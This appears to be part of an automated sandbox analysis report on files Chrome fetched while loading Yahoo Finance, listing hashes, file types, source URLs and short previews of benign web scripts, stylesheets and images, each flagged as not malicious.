                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:F112A853238B69D9B132D98DA2D2C88F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:233138A42C436214E7F544407B445FD3837B8CA4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:0CB7DCC26AA2247DD9D65312AF2398BF5C73F1232ABF17FDC50B45B03A2A64C9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:BD7849B60FB02EA82BE17C37AA30375760F3E79B5C1B30A55C7F44F6ED831610E88A17CE89310F80FD49F912CDE13BB893953FB4B863C5769E2EC038D3B8AB93
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:c56b031c-3cfa-4a4e-abe6-e18ca68e86ee
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (65508)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):940795
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.353012972977898
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24576:0Pn9O8VI15IVkDc1qME1w7riubkaYcNWV/dWnFOqvIplzohhcgZS9jhyz9yeL0Zd:qn9dVI15IVkDc1qME1w7riubkaYcNWV/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:6F3F380EC66298FD110BF2F0E3BD118A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:7A738A7F7611E26DF075AA84C84240CBE4A0761A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:E587C7C31C238B12351F5EABE23D3B9ED731BB0B4AF2E4749B05E2E271B07119
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:27D5831F0379F86DA10F03B23224E625560DAB9CA168AB6332F42B7B6C79D9A1DEAC2A6546470FFB64DA42E45101773A8AD7B41F4BCB62EF18B89E70208DE16B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:/*! 20240929-12-RELEASE */..!function(e){e.TRC=e.TRC||{},e.TRC.sharedObjects=e.TRC.sharedObjects||{},e.TRC.sharedObjects.loadedScripts=e.TRC.sharedObjects.loadedScripts||{},e.TRC.sharedObjects.loadedPixels=e.TRC.sharedObjects.loadedPixels||{}}(window),function(){var win,doc;((e,t,r)=>{const i="trc_modal_hidden",o="trc_modal_mask",n="trc_modal_dialog",a="trc_close_modal",s=t.createElement("div"),l=t.createElement("div");let c,d="";function p(){u(l,i),u(s,i),r.dom.off(t,"keyup",m),r.dom.off(t,"click",g),r.dom.off(t.getElementById(a),"click",g),r.dom.off(e,"message",b)}function h(){u(l,o),u(l,i),u(s,n),u(s,i),w.appendChild(l),w.appendChild(s),t.body.appendChild(R),y(d),c=!0}const u=function(e,t){if(e.classList)return e.classList.add(t);r.dom.removeClass(e,t),e.className+=` ${t}`},m=e=>{const t=e.which||e.keyCode;27===t&&p()},g=e=>{const t=e.target||e.srcElement;t!==l&&t.id!==a||(r.dom.stopEvent(e),p())},b=e=>{/http(s)?:\/\/www\.taboola\.com/.test(e.origin)&&e.data&&1025==+e.data&&p()},f=f
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (419)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):420
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.646165904554131
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:6:BC69mc4sl3O4b1/3mjGVuNM3r2Gi2i4gc13UXc7Rig8PhCR0V+v4v:061Pb1ej2Fr2iLgS3OIARE4v
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:B2A9502704DCBABFBA520502814A7F60
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:653E95FEF2F6F4A50F0AC9F254F65A5FEFC2F7D3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:3305A6BA0F384325F4050D2E0042DAD3F96498116955274B4E1A633640336B6E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:1035B0C6FFD0F5AA3E07E14C9B4FAA3874A6FF2BFC5104CD6F54A4BD79BF3D5E7727A1C486CACE2628E1261C59A856BFC702D1223081569FDA3C6A0771B7ACAD
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://finance.yahoo.com/assets/_app/immutable/chunks/link_off.MpzrwDsW.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:const h='<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M14.39 11 16 12.61V11zM17 7h-4v1.9h4c1.71 0 3.1 1.39 3.1 3.1 0 1.27-.77 2.37-1.87 2.84l1.4 1.4A4.99 4.99 0 0 0 22 12c0-2.76-2.24-5-5-5M2 4.27l3.11 3.11A4.99 4.99 0 0 0 2 12c0 2.76 2.24 5 5 5h4v-1.9H7c-1.71 0-3.1-1.39-3.1-3.1 0-1.59 1.21-2.9 2.76-3.07L8.73 11H8v2h2.73L13 15.27V17h1.73l4.01 4.01 1.41-1.41L3.41 2.86z"/></svg>';export{h as U};.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (2727)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):2728
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.9334139279708635
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24:6VailSKNw5UaAwO5mbVD5wSsOMOHnkpTH5Ilt/ljNNlVQ6CusntrRIOjCwetsPi3:mdSCsOGYGJjjN4FI6s
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:04E070CFCF559C1DBECB480C125C31C5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:E1CBBFC6C79F56F81DCA41570594C4A353EDFCEC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:F1BD36804711528524A6597C36E968FE35B6299AF3C1731D455DFE70EF57C642
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:61154F22277F04543C72FAE988CC96403C30AB10168581F1258E97EF495C99DADC481CDC1A9860182E2542E8AD535EEB6F5D8A7542ED9F624F96B21F9C775F65
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://finance.yahoo.com/assets/_app/immutable/assets/HeatMap.v9WG23fw.css
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:section.yf-7o1tnw.yf-7o1tnw{height:19.5rem;display:flex;flex-direction:column;justify-content:space-between;position:relative}section.yf-7o1tnw .error.yf-7o1tnw{display:flex;justify-content:center;align-items:center;height:100%}.heatMap-container.yf-7o1tnw.yf-7o1tnw{--font-size:var(--font-xs);--padding-scalar:1.5;--text-offset-multiplier:1.25;--x-padding:calc(var(--font-size) / var(--padding-scalar));--y-padding:calc(calc(var(--font-size) * var(--padding-scalar)) - var(--font-size));height:100%;display:block;width:100%;position:relative;overflow:hidden;border-radius:var(--border-radius-s);line-height:1;cursor:pointer}.rect-container.yf-7o1tnw.yf-7o1tnw{position:absolute;outline:1px solid var(--white);left:var(--left-percent);top:var(--top-percent);width:var(--width-percent);height:var(--height-percent);padding:var(--y-padding) var(--x-padding);color:var(--text1);container-type:inline-size;background-color:var(--color)}.rect-container.yf-7o1tnw.yf-7o1tnw:hover{background-color:var(--hov
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (4691)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):4741
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.327374432154568
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:96:1xrPFk8PZYnxPw7dydAebtBQQ4eqkvmidXKaAGQCP9tnQX9ZHJb:1RPFk8PZYO7QdvbNfNQCDnQrHJ
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:7DC86A3D069C04C258495638958D66A0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:94080BE562A35573FDCB725615D3592246279601
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:38FE234D60B2E5252C4E1C9D12B7D67BD1037FE8D1ABC138472394FEF52B6190
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:5032B9588AF7B2F52EC9AF8C844A38048CE62968AFB0A127CE4AC1E84B38B8029F5684BF84FA9C4E7C69BF243E003F69E750562BA990E97D8C0468475DBDF129
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://static-cdn.spot.im/production/messages-count/tags/v2.4.0/messages-count-bundle.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:var __SPOTIM__;(()=>{"use strict";var e={n:o=>{var t=o&&o.__esModule?()=>o.default:()=>o;return e.d(t,{a:t}),t},d:(o,t)=>{for(var n in t)e.o(t,n)&&!e.o(o,n)&&Object.defineProperty(o,n,{enumerable:!0,get:t[n]})},o:(e,o)=>Object.prototype.hasOwnProperty.call(e,o),r:e=>{"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})}},o={};e.r(o);const t=window.__SPOTIM__.lib.react;var n=e.n(t);const s=window.__SPOTIM__.lib.ReactDom;var r=e.n(s);const i=window.__SPOTIM__.SERVICES.configProvider;var a=e.n(i);const c=window.__SPOTIM__.lib["@spotim/launcher-shared/hooks"];function l({counterMessage:e}){const o=void 0===e||e<0,s=(0,c.useHost)();return(0,t.useEffect)((()=>{o||s.childNodes.forEach((e=>{e.nodeType===Node.TEXT_NODE&&e.remove()}))}),[s,o]),o?null:n().createElement(n().Fragment,null,n().createElement("style",null,"\n .messages-count {\n display: inline;\n curso
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (3412), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):3412
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.0908215241003845
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:48:YozhSx5M2PjYJakqOPyGbmq1Tk0GGbLq12k0yXD0THZHL2yVLT4hk14yIJZFOtkK:3hqjg8q1Tr9q12ryw1L2UPq1ktkNCYc
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:956DABF4D28930BC42D934995B814D6D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:D461E2FAB9B3E6F89561FEB5C2A5CBBB26198951
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:CA9998A600267DC2431ABC077F8CF7A5476A46EE1E82D0C6F12BB17E512C3FE8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:6A98F3C8201E544DB161FA89E8A434B35B179F7D33446247B13EA08B43A7E79D44025524AEFDE0215827B2B2B95F8AC349712DCA00AA3073DDF2C4EE11B9F710
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://s.yimg.com/aaq/wf/wf-text-1.2.0-modern.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:!function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define("wafer-text",[],t):"object"==typeof exports?exports["wafer-text"]=t():(e.wafer=e.wafer||{},e.wafer.wafers=e.wafer.wafers||{},e.wafer.wafers["wafer-text"]=t())}("undefined"!=typeof self?self:this,function(){return function(e){function t(o){if(r[o])return r[o].exports;var n=r[o]={i:o,l:!1,exports:{}};return e[o].call(n.exports,n,n.exports,t),n.l=!0,n.exports}var r={};return t.m=e,t.c=r,t.d=function(e,r,o){t.o(e,r)||Object.defineProperty(e,r,{configurable:!1,enumerable:!0,get:o})},t.n=function(e){var r=e&&e.__esModule?function(){return e.default}:function(){return e};return t.d(r,"a",r),r},t.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},t.p="https://s.yimg.com/aaq/wf/",t(t.s="./src/entry.js")}({"./src/entry.js":function(e,t,r){"use strict";function o(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a function")}function n
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1423863
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.4158475686890055
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:12288:anabJ5mwCtCj8vxpzrJTB92t28I/Uv2uI4UPxhsWmgDlAtnlDn45FgrFf5o9HU9z:PGwCCIvHvJ992tmU
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:15D3F856B78470A7BAF99B6865760AAF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:9828B8EFDF334F51599EB13106BF713F04636E0B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:13EE0F18210C5B956E6F1A1499405C0D7F583A5653AB3BF659B792F242271206
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:EE93D437537CB6F3F78A98035D4EEFE338973B4FF71C3E06B762D68B2CA9DADE4E10D78ED908319B6F402E9FB0A894E0B0EE89E122E1329A6DC766DFE2316DE9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://cdn.taboola.com/libtrc/yahooweb-network/loader.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:(function(){var __webpack_modules__={6337:function(){!function(){"use strict";if("object"==typeof window)if("IntersectionObserver"in window&&"IntersectionObserverEntry"in window&&"intersectionRatio"in window.IntersectionObserverEntry.prototype)"isIntersecting"in window.IntersectionObserverEntry.prototype||Object.defineProperty(window.IntersectionObserverEntry.prototype,"isIntersecting",{get:function(){return this.intersectionRatio>0}});else{var e=function(e){for(var t=window.document,n=r(t);n;)n=r(t=n.ownerDocument);return t}(),t=[],n=null,i=null;a.prototype.THROTTLE_TIMEOUT=100,a.prototype.POLL_INTERVAL=null,a.prototype.USE_MUTATION_OBSERVER=!0,a._setupCrossOriginUpdater=function(){return n||(n=function(e,n){i=e&&n?u(e,n):{top:0,bottom:0,left:0,right:0,width:0,height:0},t.forEach((function(e){e._checkForIntersections()}))}),n},a._resetCrossOriginUpdater=function(){n=null,i=null},a.prototype.observe=function(e){if(!this._observationTargets.some((function(t){return t.element==e}))){if(!
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):43
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:CUkxl7/lHh/:slf/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:B4491705564909DA7F9EAF749DBBFBB1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:279315D507855C6A4351E1E2C2F39DD9CD2FCCD8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:4E0705327480AD2323CB03D9C450FFCAE4A98BF3A5382FA0C7882145ED620E49
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:B8D82D64EC656C63570B82215564929ADAD167E61643FD72283B94F3E448EF8AB0AD42202F3537A0DA89960BBDC69498608FC6EC89502C6C338B6226C8BF5E14
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://us-u.openx.net/w/1.0/sd?id=537072971&val=07c89b85-4c1c-424d-8df0-0123ed6cebb6&ttd_puid=89da3b4d-4019-3a17-5e17-79a012d51d47&gdpr=0&gdpr_consent=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:Java source, ASCII text, with very long lines (830)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):831
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.20392278255627
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24:JFCFnDGaGXLqdtysALYk4voFbqwuAd55VuWj:JFknDGSYsALYhvkbum55wWj
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:FF0039543C479A49ECCFABE7F24D7188
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:7855BD3757541BCED2984F96F2B7CE345D08AD49
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:7BBB99D79FAD96AA1CB1D6EDB517EEF44EBDEC76F369F68E40E5F1690FA16277
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:DD29C802D6648ADFDFC4E5CDE5A8330430564367D5B3981871408C5C22C2C9A526BF41CF7830C76AB3543631293932C6D9CE081007B1DE13CEC56E66A01CB985
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:import{s as x,e as u,t as h,b as S,d,f as v,h as b,i as m,j,k as _,l as g,m as E,n as $,o as k}from"../chunks/scheduler.Dsuh-FKt.js";import{S as q,i as y}from"../chunks/index.CvwOawEI.js";import{p as C}from"../chunks/stores.BCwnb1-k.js";function H(i){var f;let t,s=i[0].status+"",r,o,n,p=((f=i[0].error)==null?void 0:f.message)+"",c;return{c(){t=u("h1"),r=h(s),o=S(),n=u("p"),c=h(p)},l(e){t=d(e,"H1",{});var a=v(t);r=b(a,s),a.forEach(m),o=j(e),n=d(e,"P",{});var l=v(n);c=b(l,p),l.forEach(m)},m(e,a){_(e,t,a),g(t,r),_(e,o,a),_(e,n,a),g(n,c)},p(e,[a]){var l;a&1&&s!==(s=e[0].status+"")&&E(r,s),a&1&&p!==(p=((l=e[0].error)==null?void 0:l.message)+"")&&E(c,p)},i:$,o:$,d(e){e&&(m(t),m(o),m(n))}}}function P(i,t,s){let r;return k(i,C,o=>s(0,r=o)),[r]}class B extends q{constructor(t){super(),y(this,t,P,H,x,{})}}export{B as component};.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 300x156, components 3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):21897
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.942427635194226
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:384:ZtrXsV3bAR9EikumiZu7yto17Rwk5lVoru31pGL4daKMVuNbQq9vlSg4W/dtv:bstcE/SZu7ytojwkQoYLWn99vlSk/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:A77A34E73F27E2F965919C4925A9CD1D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:5A6206C52E00A2B28E96E69900144834EFC5346B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:1C7892CB1A55FD00845559D3DD06C20DB79C55C2B532391F407F6AF8CC49827B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:FA3DD95325339AAD988A80C7C1FBA4399247EEFEB8F159C057834463ECA7055CA957597298841FB5A53DDDD7680B67F42D8DE198E3A1C86E4D922F48655AE6FF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:......JFIF.............4ICC_PROFILE......$appl....mntrRGB XYZ ...........9acspAPPL....APPL...........................-appl...g.F.K.Dn..u.................................desc.......ecprt...d...#wtpt........rXYZ........gXYZ........bXYZ........rTRC....... chad.......,bTRC....... gTRC....... desc........Display P3..................................................................................text....Copyright Apple Inc., 2015..XYZ .......Q........XYZ ..........=.....XYZ ......J....7....XYZ ......(8.......para..........ff......P........sf32.......B.......&.......................n...C....................................................................C.........................................................................,............................................M..........................!..1A"Qa.2q...#B...Rb.3r.....$C.....%4Sct..&6T....................................6.......................!1....#A"23.BQ.$4CRaq.%Sbr...............?.S.)...V...X...%n.J.%...b~@.q...|.+....&Y.._..
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):39
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.1772155278654886
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:BVCHYKXbFnCJ:BMHn9CJ
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:A82BCE0734BE83B474EAF1F1ADA8139C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:F11AD97BFFC08D1B81945FCE0B2AA6F12F278FC4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:85C9F78822701AD5F3A94497491296DF5D68985A4E1313CABF64A734ABD315AA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:F72EFF32EEACE39A8341966C16308EC941829F46DDAA955ED2AD0C2FD94F122B97CACF86FB99B1CF7F64C89D405CCB408DB1474EEB70EC41CAEC96905AD7BBD3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://finance.yahoo.com/assets/_app/immutable/chunks/index.rV6zwFgL.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:const s=!0,o=!1;export{s as b,o as d};.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:Java source, ASCII text, with very long lines (6883)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):6884
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.498216720605911
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:192:Ud8a79Jn9kziweoH9NAlLXTdNaYhd+PLV/TTtj17zS5n6c7lT7n02zrbPSwlL/Mu:UKa7T9kbTyLXBPYtrzSZpn5WwlY3ZM
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:E9A8DBB7EE04E3112FCF282F27BC720A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:9F92CD5326A3202BBCF4F2EA62DC7E1C9E2ED7EA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:49025C5E11EC6A6118880790284B7E306CB4C1381BDC7AED076CB0A2AA67D0D8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:51230CBD71112CEBECBBC2D022ED8A114CA4C7CF93F02584E712FFE97E5079A9477BA00677873E912D1F4805BF771E70D5D991D5C8DCC6F3779EC99EABD3D1EB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://finance.yahoo.com/assets/_app/immutable/chunks/Tooltip.CzSuDxyY.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:import{s as je,c as F,e as q,b as Y,d as P,f as V,j as I,i as E,q as B,O as R,L as D,k as J,l as k,u as G,g as K,a as U,I as Ee,A as Me,t as me,h as _e,B as oe,J as Le,m as Se,Q as se}from"./scheduler.Dsuh-FKt.js";import{S as Ne,i as Ce,t as Z,a as x}from"./index.CvwOawEI.js";import{g as Be}from"./spread.CgU5AtxT.js";import{c as ae,f as fe,o as re,d as ke,s as Oe,a as Ae}from"./floating-ui.dom.C5fi-pG6.js";const Te=i=>({}),ue=i=>({}),pe=i=>({}),ce=i=>({});function de(i){let t;return{c(){t=q("div"),this.h()},l(l){t=P(l,"DIV",{class:!0}),V(t).forEach(E),this.h()},h(){B(t,"class","arrow yf-7dju6j")},m(l,o){J(l,t,o)},d(l){l&&E(t)}}}function He(i){let t,l,o,m=[{class:o=`title ${i[8]}`},i[5]?{id:i[5]}:{}],_={};for(let a=0;a<m.length;a+=1)_=Me(_,m[a]);return{c(){t=q("h3"),l=me(i[3]),this.h()},l(a){t=P(a,"H3",{class:!0});var y=V(t);l=_e(y,i[3]),y.forEach(E),this.h()},h(){oe(t,_),D(t,"yf-7dju6j",!0)},m(a,y){J(a,t,y),k(t,l)},p(a,y){y[0]&8&&Le(l,a[3],_.contenteditable),oe(t,_=Be(m,[y[0]&256&&o!==
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (16463)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):16895
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.5029479546237825
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:384:INWOGVizidhosaUlkogyjyOtLIlFi3anVJMh2iVDaA1wyWkM:IoOGczidrrkogUyOtUlFisVJcN1vWkM
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:96558A188F7E6806C5495BEA48150E1E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:670FFF800819C701639B95BACD5D46B88232E3DA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:FA0BDE4F9F0795649792EC9E3575F754F062EF800EBBB60874EA8C28C0433FAD
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:1EDDBB25443561F46B29D45A5F0554C4CB888C3AD0012FC0647080F8569B20F55A548CA53F22A362B84984D160F9D8234DBB898E0C3D70B48C7B0A81484149F2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://finance.yahoo.com/assets/_app/immutable/chunks/initializePage.LkEoQoQZ.js
